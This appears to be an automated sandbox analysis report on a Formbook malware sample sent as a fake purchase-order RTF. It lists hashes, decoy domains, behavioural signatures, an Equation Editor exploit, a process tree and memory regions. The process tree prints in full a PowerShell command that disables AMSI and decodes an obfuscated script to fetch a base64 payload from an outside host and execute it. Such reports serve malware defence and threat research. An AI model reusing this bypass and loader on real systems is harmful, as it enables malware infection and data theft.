Analysis

  • max time kernel
    162s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 07:25

General

  • Target

    NewOrder-PO300122.rtf

  • Size

    2.2MB

  • MD5

    a9c56c16c6c705510fea0b1419f87ec0

  • SHA1

    b6274154f6f8301de35df1c346d534a0c782ec6d

  • SHA256

    278a01105105ba46b8303bb8933c4a3010aa7098342460ab4090e3ddbafb19ab

  • SHA512

    6f127ca937b147b616d563ab2eb1535488d0187a5bd8aa9b7d70ad3462a1d4899f7be47095a60251aaf1381a1f13fea8d247d1775995ed9f1c2b0d82f9788e32

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

uk83

Decoy

wa7ajzar9hwa.xyz

adithyaimpacts.com

rdt2.xyz

clubexelb.com

tempo-liquido.com

vinciforever.com

hematechnoworld.com

pdswakl.com

nerdifiedsuckleheads.com

roadstartravel.com

selltobillingstoyota.com

tintaoficina.com

2ndo.net

gaiaindtech.com

scenicds.com

xn----8sbc0brcdie1aj.xn--p1acf

bettingsitesindia.online

nieruchomosci.fyi

josias-shop.com

martinismith.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • Formbook Payload 4 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\NewOrder-PO300122.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1732
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\SysWOW64\svchost.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:1224
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:528
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:1992
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$4788586599584889393948588493992828293948=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,98,100,56,99,99,98,98,48,57,54,54,101,53,102,51,54,54,101,97,101,49,53,51,102,102,49,54,53,51,48,50,50,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($4788586599584889393948588493992828293948)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1124
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:596

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Exploitation for Client Execution

        1
        T1203

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          9d2744133a60d3a99489865204410ac7

          SHA1

          d803658cce0f52a907c07967d52f6ea20a29ef34

          SHA256

          92b3addcf9315f1799920b729b122cb070312071eb3e8b9cd8f17828c66939e7

          SHA512

          0a9de2363b44ea5bd54a7cab0e3acecb81c20b50f3f4a8069f350fab067daa98d8a28b327949b7da4929a73f7c74c535d131855ebe1ed3016e4b3cb8544e9313

        • memory/596-73-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/596-81-0x0000000000210000-0x0000000000225000-memory.dmp
          Filesize

          84KB

        • memory/596-80-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/596-78-0x0000000000190000-0x00000000001A5000-memory.dmp
          Filesize

          84KB

        • memory/596-77-0x0000000000810000-0x0000000000C13000-memory.dmp
          Filesize

          4.0MB

        • memory/596-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/596-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1124-71-0x000000000272F000-0x0000000002730000-memory.dmp
          Filesize

          4KB

        • memory/1124-61-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
          Filesize

          8KB

        • memory/1124-66-0x000000000270B000-0x000000000272A000-memory.dmp
          Filesize

          124KB

        • memory/1124-68-0x0000000002732000-0x0000000002734000-memory.dmp
          Filesize

          8KB

        • memory/1124-69-0x0000000002731000-0x0000000002732000-memory.dmp
          Filesize

          4KB

        • memory/1124-72-0x0000000002734000-0x0000000002735000-memory.dmp
          Filesize

          4KB

        • memory/1124-62-0x000007FEF2BA0000-0x000007FEF36FD000-memory.dmp
          Filesize

          11.4MB

        • memory/1124-70-0x000000000272E000-0x000000000272F000-memory.dmp
          Filesize

          4KB

        • memory/1124-65-0x0000000002704000-0x0000000002707000-memory.dmp
          Filesize

          12KB

        • memory/1124-64-0x0000000002702000-0x0000000002704000-memory.dmp
          Filesize

          8KB

        • memory/1124-63-0x0000000002700000-0x0000000002702000-memory.dmp
          Filesize

          8KB

        • memory/1396-82-0x0000000007300000-0x0000000007445000-memory.dmp
          Filesize

          1.3MB

        • memory/1396-79-0x00000000074D0000-0x0000000007624000-memory.dmp
          Filesize

          1.3MB

        • memory/1396-87-0x0000000003D20000-0x0000000003DC5000-memory.dmp
          Filesize

          660KB

        • memory/1636-57-0x0000000076421000-0x0000000076423000-memory.dmp
          Filesize

          8KB

        • memory/1636-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1636-55-0x0000000070081000-0x0000000070083000-memory.dmp
          Filesize

          8KB

        • memory/1636-54-0x0000000072601000-0x0000000072604000-memory.dmp
          Filesize

          12KB

        • memory/1636-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1876-83-0x0000000000850000-0x0000000000858000-memory.dmp
          Filesize

          32KB

        • memory/1876-84-0x0000000000080000-0x00000000000AF000-memory.dmp
          Filesize

          188KB

        • memory/1876-85-0x0000000000860000-0x0000000000B63000-memory.dmp
          Filesize

          3.0MB

        • memory/1876-86-0x0000000000620000-0x00000000006B4000-memory.dmp
          Filesize

          592KB